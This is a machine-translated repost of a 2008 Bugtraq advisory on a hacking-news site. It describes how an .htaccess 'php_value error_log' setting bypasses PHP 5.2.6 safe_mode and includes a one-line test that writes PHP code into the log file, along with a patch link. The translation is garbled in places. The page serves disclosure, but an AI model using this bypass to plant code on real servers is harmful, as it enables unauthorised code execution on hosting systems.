Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > System crack > Content
Hot Articles
GeoVision Digital Video
Adobe Acrobat and the Re
Samba group_mapping.tdb/
The Sleuth Kit - UNIX-ba
Marvell 88W8361P-BEM1 ch
CS-Cart core / user.php
phpBB Small ShoutBox mod
Outlook Web Access for E
FlexCell Grid ActiveX co
PHP error_log bypasses t
Apple Bonjour for Window
nginx file type error pa
DedeCMS V5.5 Final GetWe
Details of PHP code exec
The VMware 2008-0014 ren
Recommend Articles
Mozilla the Firefox 2.0.
DC++ many long-distance
VLC the media player WAV
The Wireshark 1.0.1 edit
Wordpress XML-RPC connec
ServerView Web connectio
PCRE the pcre_compile.c
phpMyAdmin long-distance
Panda the ActiveScan lon
BlueZ the SDP load handl
1024 CMS many documents
WeFi journal file local
vBulletin adminlog.php r
Microsoft Windows DNS se
Adobe RoboHelp Server he
New Articles
DiY - brief loophole ana
Freefloat FTP Server ove
I can with Apache endeav
HP - UX NFS/ONCplus unkn
HP - UX FTPD remote deni
HP - UX DCE can send acr
HP - UX 'useradd' local
HP - UX swagentd remote
HP - UX Numbers local de
HP - UX System under the
HP - UX 'FTPD' unknown r
HP TCP/IP Services for c
From Solaris NFS pages f
From Solaris XScreenSave
Sun Solaris Auditing Ext
PHP error_log bypasses the safe mode limit crack
  Add date: 01/08/2009   Publishing date: 01/08/2009   Hits: 177

Issues the date: 2008-11-20
Renewal date: 2008-11-21

Is affected the system:
PHP PHP 5.2.6
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 32383

PHP is the widespread use general goal script language, the especially qualify in the Web development, may insert to HTML.

When uses safe_mode by the overall situation pattern:

php.ini­:
safe_mode = On

And stated through php_admin_flag:

<Directory “/www " >

    php_admin_flag safe_mode On
</Directory>

When founds some php script in /www/ and attempts to transfer:

ini_set (“error_log”,” /hack/ “);

Or in /www/.htaccess

php_value error_log “/hack/bleh.php”

The result is:

Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not \
allowed to access /hack/ owned by uid 1001 in Unknown on line 0

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script \
whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php \
on line 4

This is because in php.ini stated safe_mode. But if in the httpd.conf use:

php_admin_flag safe_mode On

Only will obtain:

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script \
whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php \
on line 4

in .htaccess permits php_value error_log “/hack/blehx.php " the syntax, causes to bypass safe_mode the limit.

<* origin: Maksymilian Arciemowicz (max@jestsuper.pl)
 
  Link: http://marc.info/?l=bugtraq&m=122720980532226&w=2
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!

error_log (“<? php phpinfo(); ? >”, 0);

Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:

PHP
---
At present the manufacturer had already issued the promotion patch repairs this security problem, welcome to manufacturer main page downloading:

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup
 
Prev:Microsoft active table of contents LDAP server user enumeration crack Next:vBulletin Visitor Messages attachment module cross station script and cross station request forge cr

Comment:

Category: Home > System crack
Home